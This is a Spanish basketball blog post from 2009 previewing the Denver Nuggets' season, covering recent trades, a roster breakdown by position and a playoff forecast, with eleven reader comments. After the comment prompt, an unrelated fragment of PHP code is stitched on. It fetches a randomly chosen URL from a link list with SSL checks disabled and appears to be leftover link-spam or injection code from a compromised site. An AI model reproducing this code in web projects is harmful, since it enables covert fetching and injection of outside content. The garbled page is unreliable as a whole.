Denver Nuggets: Encuentros en la 3ª Fase

17 de October de 2009 por Sergio

19 de Diciembre de 2006: El equipo de la capital de Colorado se hacía con los servicios de Allen Iverson a cambio de Andre Miller y Joe Smith. A pesar de algunos críticos (entonces vistos como agoreros) el equipo fichaba al mayor anotador de la ultima década para unirlo a un equipo en el que ya se contaba con C.Anthony, Camby, Nenê, Kenyon Martin, J.R.Smith, Steve Blake, Linus Kleiza y, ¿por qué no?, “lentejita” Boykins. ¿Conclusión?: Candidatos inmediatos al titulo junto con los Dallas, Phoenix y San Antonio de entonces.

Era la primera vez desde los tiempos de Kiki Vandeweghe y Alex English en los que el equipo contaba con dos de los mejores anotadores de la NBA (de hecho eran los dos mejores en el momento del fichaje) desde los años 80 en los que vivieron su última presencia en las Finales de Conferencia. A pesar de que el mismo día del traspaso de Iverson se conoció la sanción de 15 partidos a Carmelo y otros 10 a J.R.Smith por su famosa pelea en el Madison, todo eran buenos presagios y, aun no demostrando todo el potencial en la Regular Season, terminaron con un record de 45-37 que les devolvía otro año mas a los Playoffs. El emparejamiento con los San Antonio Spurs, a la postre ganadores ese año, reflejó la carencia de juego en equipo y la tendencia de sus dos estrellas hacia el “engrose” de estadísticas antes que aumentar la competitividad del grupo.

Al año siguiente, los mismos problemas se vieron aumentados por la aparición de un cáncer testicular en Nenê que, junto a los problemas de equipo ya mencionados y los refuerzos del resto de equipos destinados a pelear por el título (véase Gasol, Garnett,…), hicieron que Denver dejara de estar entre los equipos favoritos al titulo. A pesar de ello, consiguieron clasificarse para los Playoffs como 8º, siendo la primera vez que un equipo en esa posición conseguía llegar a las 50 victorias. ¿Qué ocurrió después? Barrido de L.A. y a casita.

La campaña pasada comenzó para ellos con los traspasos de Camby (a cambio de una segunda ronda) y un Allen Iverson por Chauncey Billups que hacía presagiar que el equipo entraría en otra dinámica como conjunto que, con el tiempo, daría sus frutos y reverdecería viejos laureles. Sí, exactamente el tiempo desde el traspaso hasta el primer partido de Billups. Desde el primer momento el juego mejoró y, tanto Billups como Anthony jugaron el All-Star, estando incluso considerados para las nominaciones al MVP. Terminaron la Regular segundos de Conferencia por primera vez en mucho tiempo y lograron pasar las dos primeras rondas con una media de 20 puntos de ventaja por partido frente a New Orleans (incluida una victoria a domicilio por 58) y Dallas. Para algunos, llegaban a la Final del Oeste en un mejor momento de forma que L.A., pero el milagro no se produjo y se despidieron del título.

¿Quién hubiese presagiado esos vaivenes en este equipo durante los 3 últimos años y sus consecuencias? Hay cosas que es mejor no saber…

Este año el equipo se presenta con la misma columna vertebral del año anterior salvo la figura de Dahntay Jones, escolta titular durante gran parte del curso, y Linus Kleiza que aceptó la oferta de los magnates griegos. Las incorporaciones del equipo han venido en forma de 4 rookies (Ty Lawson, Brumbaugh, Draper y Looby) junto a jugadores de un perfil similar a los que han perdido como Arron Afflalo, Malik Allen y Joey Graham, todos ellos jugadores de equipo destinados a dar calidad en los escasos minutos de los que dispongan.

El puesto de base es quizás en el que se atesora más cantidad y calidad en el equipo. A pesar de que el puesto de titular parece asegurado para Billups (no se pierde una 2ª ronda de 2002), la llegada del novato Ty Lawson (campeón de la NCAA) y Anthony Carter (quizás uno de los bases mas puros del campeonato) otorga a George Karl una variedad de recursos ilimitada para ese puesto. La figura de Dontaye Draper como base se verá reducida a los minutos de la basura.

Para el puesto de escolta debemos pensar que tanto Carter como Afflalo, a pesar de su estatura y sus condiciones, han rendido en numerosas ocasiones como escoltas de carácter defensivo. Ambos compartirán los minutos con J.R.Smith, una de las cabezas mas locas y geniales con un balón que hay en la liga y todo un desatascador para partidos apretados. El papel del saltarín J. White sea seguramente testimonial.

El puesto de alero seguramente sea el que menos minutos reparta del quinteto con un Carmelo que debe refrendar el aumento de madurez y liderazgo que se le vió el año anterior. Por lo pronto llega con algunos kilos de menos y mayor compromiso que otros años. Como recambios Joey Graham y Balkman. Pocos minutos pero parecen bien cubiertos.

En las posiciones de hombres altos, el nivel de intimidación de gente como K. Martin, Nenê, “Birdman” Andersen y el novato (solo sabe defender) Kurt Looby, es probablemente el mayor de todos los equipos de la liga. Nenê se ha convertido en uno de los mejores jugadores en su posición de la liga, justo la evolución contraria que parece estar sufriendo Kenyon Martin con su contrato de 14 kilos al año. Ambos parecen destinados a ocupar las posiciones titulares. Andersen y Malik Allen serán, en un principio, los suplentes de ambas posiciones en detrimento de Brumbaugh y Looby.

A pesar de no contar con ningún tirador puro salvo Smith, este equipo con nombre de comida rápida ha estado basado históricamente en su potencial ofensivo y en rápidas transiciones, por lo que no debería suponer un gran problema.

Resumiendo, las expectativas de este equipo que mantiene a todos sus grandes jugadores sería la de repetir las buenas sensaciones que dejaron el año anterior. Si las lesiones los respetan parece un objetivo bastante asequible, si bien para pelear por cotas más altas deberán estar muy atentos en la Regular para coger posiciones de ventaja de campo en al menos 2 rondas. Quizás la sanción de 7 partidos a J.R.Smith al principio de temporada les cueste alguna victoria ya que se me antoja un jugador fundamental. Seguro que un entrenador de la veteranía de Karl sabe administrar a sus jugadores para lograr objetivos que satisfagan a los fans de Colorado.

Siendo realistas, la falta de fichajes de relumbrón les pone un peldaño por debajo de SAS y LAL y al nivel de Portland y Dallas.

Quinteto titular: Chauncey Billups, Anthony Carter/Arron Afflalo, Carmelo Anthony, Kenyon Martin y Nenê Hilario.
Sexto hombre: J.R.Smith

Pronóstico: 2ª ronda del Oeste

Comenta

11 comentarios a esta entrada

  1. aro_pasado_no_newtoniano dice:
    #1

    Lo de Kleiza me parece una relativa putada, que me parece un jugadorazo tremendous.

      Citar

  2. Jabho dice:
    #2

    Coincido con Aro, a Kleiza no le dieron el rol adecuado… es un buen jugador y una pena.

    Los Nuggets no me inspiran confianza para ganar. Coincido son Sergio en su visión, son un buen equipo y harán un buen año, no aspiran al titulo pero si a dar guerra….

    Por otro lado me gustaría ver este equipo dirigido por otro entrenador… creo q a Karl le queda algo grande la plantilla o el carácter de algunos de los jugadores

      Citar

  3. TheDeerHunter dice:
    #3

    Buen debut, Sergio… aunque mal día para debutar.

    Sorprendieron el año pasado. Fue impresionante el nivel que alcanzaron… lo pasé bastante mal en la final de conferencia contra ellos.

    Diría que este año lo van a tener más difícil, con lo poco que han reforzado al equipo… pero igual me vuelven a dejar en evidencia. Mejor me callo.

      Citar

  4. sergio dice:
    #4

    Si es verdad que no ha sido un gran dia…. contento por aportar algo y bastante triste por perder a alguien tan importante en este mundillo del que me hizo seguidor.

      Citar

  5. Dantley2 dice:
    #5

    Magnífico Sergio, mejor que los Nuggets, jeje. No sé, hay algo que me falta en ese equipo. Después de que lo que se veía no funcionó, lo de los dos potenciales +30ppg, parece que se consolidan como equipo de playoffs pero sin más. Quizá un interior ofensivo, o que JR Smith deje de creerse superestrella, o que Melo sea ambicioso para el equipo.

      Citar

  6. Viva_Dirk dice:
    #6

    Les falta un escolta de esos que hacen un poquito de todo, aunque vaya creo que harán una gran temporada.

      Citar

  7. kantonyo dice:
    #7

    Dentro de los equipos que no llegan a ser favoritos, Denver es el equipo que mas me gusta y me apetece ver jugar. Creo que esta temporada vamos a ver a un gran Carmelo Anthony, apuesto a que va a entrar en el selecto grupo de grandes de la liga como Bryant, James, Wade, Duncan o Garnett.

    En el puesto de base, Billups llega a esta temporada con 35 años, a priori una edad complicada, pero que viendo la temporada pasada, todo apunta a que seguirá a un gran nivel. Para mí fue el mejor base del año pasado, pasó por encima de Chris Paul en la primera ronda, le dio una autentica lección de basket y nos dejó claro que todavía le queda mucha cuerda.

    En la pintura, al tesón y fuerza física de Kenyon Martin y el “pajaro” Andersen debemos sumarle la gran progresión que el año pasado demostró el brasileño Nené, que posiblemente le hagan estar entre el top 5 de pívots “puros” en la liga.

    El puesto de escolta es claramente lo más debil de la plantilla, pero no por ello de bajo nivel. Veremos si este año George Karl, se atreve a poner definitivamente de títular a Jr Smith, que tuvo una mejora considerable en la última temporada, mejorando hasta los 15 puntos por partido. O apuesta por la nueva adquisión de Detroit, Afflalo, que en los pocos minutos que ha tenido en Motown, ha demostrado buenas maneras.

    Por último yo destaco especialmente la elección del Draft, de Ty Lawson, el año pasado segui bastante la NCAA, y considero que fue el verdadero alma de los campeones del torneo y aunque el MvP lo ganó Ellington, considero que fue el jugador más valioso del torneo. Es de los novatos que más preparado está para aportar desde el principio, la pena o alegría es que tiene por delante a Billups.

    El aspecto negativo, personalmente creo que es su corta plantilla, que le puede jugar una mala pasada por alguna lesión o al final de temporada.

      Citar

  8. L.Casei dice:
    #8

    Muy bien escrito ” Nenê “, Sergio.
    Para un gallego bilingüe que domina un poco el Portugués, da gusto que se escriba correctamente. Lo único que Hilario va con tilde (Hilário), pero se perdona. Igual que Romário, que después de jugar años en España seguían sin escribirlo bien, con la tilde… Cómo somos los españoles con las lenguas… Y en Inglaterra escriben Hilário, portero suplente del Chelsea, y no tienen tilde ni en el teclado…

      Citar

  9. Tobal dice:
    #9

    Creo que Denver tiene un gran equipo titular para ganar a cualquiera,pero el banquillo lo veo algo justito para poder llegar muy lejos,aunque como mínimo pueden llegar a semifinales,por cierto que Carmelo Anthony está en un estado de forma descomunal,es una máquina de hacer puntos y cada vez que el balón pasa por sus manos,es determinante.

      Citar

  10. sergio dice:
    #10

    @L.Casei: Es que precisamente tengo el teclado roto… por eso no las pongo xD. Cuando escribo con el portatil (con tilde) si lo hago. Lo siento, realmente me molesta porque yo tambien soy un maniatico (con tilde) con los acentos y me molesta que la gente escriba mal pero…. actualmente es lo que hay. Tambien escribo “mas” sin acento pero fijate (con tilde) que en el analisis (con tilde) que yo mismo he hecho sobre los Nuggets si (con tilde) le pongo su correspondiente acento al brasileño.

      Citar

  11. rojorob dice:
    #11

    Sergio, con un poco de retraso pero nunca es tarde. He estado revisando un poco por curiosidad los autores de los posts y he visto que habías escrito este. Enhorabuena y anímate con alguno más, que está realmente bien. Saludos!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>